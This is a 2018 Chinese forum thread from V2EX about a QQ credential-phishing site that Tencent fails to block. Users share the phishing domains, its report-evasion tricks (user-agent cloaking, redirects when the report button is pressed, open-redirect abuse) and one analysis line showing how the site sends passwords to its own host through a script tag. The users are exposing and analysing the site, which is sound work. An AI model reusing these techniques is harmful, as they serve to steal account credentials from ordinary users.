腾讯到现在都不能自动识别出这种低端钓鱼盗号网站么

2018 年 12 月 22 日
 HXM

截图: https://i.loli.net/2018/12/22/5c1d0f003b937.png

链接是: http://sundonggen.com 不要在里面输入帐号密码!!

破网站连个 https 都没有,输入时弹出的键盘还是 iOS 键盘,让我一个用 Android 的情何以堪

不管输入什么第一次登录都提示错误

如果你在 QQ 内置浏览器打开,然后按右上角举报,他会在你按右上角时跳转到腾讯官方的一个页面,这样举报时自动填写的链接地址就是腾讯官方页面地址,就举报不到它

如果电脑访问,即使用 chrome 开发者工具模拟 iPhone6 或 pixel 2,也会跳转腾讯官方的一个页面

Whois 查询到域名在阿里云注册,阿里云的举报还居然需要注册登录或者上传身份证明

腾讯拦截不了,想举报一下做一点微小的工作也不行。

9496 次点击
所在节点    全球工单系统
45 条回复
boris1993
2018 年 12 月 22 日
孙冻根.com ???
v2016
2018 年 12 月 22 日
我去研究研究 希望别挂掉
orangeade
2018 年 12 月 22 日
腾讯只会屏蔽没备案网站
C2G
2018 年 12 月 22 日
测试真伪很简单 QQ 号输入 10001 如果提示不是正确 QQ 号一定是假的 反之也不一定是真的
banshicy
2018 年 12 月 22 日
还有这个,查域名也是阿里云注册的,现在人都这么屌了么,, [提示] 不要输入任何信息 http://zhijianjimo.com
Drumming
2018 年 12 月 22 日
没了
boris1993
2018 年 12 月 22 日
@Drumming #6 得用手机,电脑打开自动跳到一个图片上
mario85
2018 年 12 月 22 日
chrome 设置 ua 没
zyqf
2018 年 12 月 22 日
我之前写了个脚本,随机生成 QQ 号和密码提交上去。放在几个服务器上跑了两天,提交了大概有一两百万条吧。
xeaglex
2018 年 12 月 22 日
@zyqf 你这就很强了 23333
zturns
2018 年 12 月 22 日
腾讯只看钱,备案的网站有时候还没没备案的有用。创宇云天天打电话
xanthu
2018 年 12 月 22 日
上次碰个 https 的钓鱼网站把身份证和手机信息泄露了,贼气一点办法都没得
HXM
2018 年 12 月 22 日
@banshicy 感觉像一套源码,弹出的键盘都一模一样

@mario85 对,应该是做了 UA 判断

@orangeade 这种网站也居然也敢光明正大的备案。。。

@xanthu 老哥,https 也不能证明就是官方网站,事关重要账号的网站最好点到安全信息里看看证书详情
xuecan
2018 年 12 月 22 日
那就去举报备案
dfourc
2018 年 12 月 22 日
@zyqf 哈哈哈哈哈
AlisaDestiny
2018 年 12 月 22 日
简单分析了一下。这人还挺狡猾的,没有通过常规的 ajax 的方式提交,而是通过 js 动态创建 script 标签,在指定 src 的时候把用户名和密码当做参数附加在后面:sundonggen.com/user.js?token=encodeURIComponent(btoa(JSON.stringify({ u: "你的 QQ",p: "你的密码"}))));然后返回的是正常的 jquery 库代码。
opengps
2018 年 12 月 22 日
我见过最牛逼的钓鱼网站,自带举报入口,让那些举报的人找不对入口
580a388da131
2018 年 12 月 22 日
做的好精致
LanFomalhaut
2018 年 12 月 22 日
实际使用中还有腾讯的“任意跳转漏洞”等等在利用: )
甚至有表现为 QQ 打开后下拉 上方 URL 显示为腾讯的某官方域名
openbsd
2018 年 12 月 22 日
鹅厂的回复一般是:您的举报证据不足,如果您有了经济损失啥的,请报警,所以说,免费的东西真心有点坑

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://study.congcong.us/t/519899

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX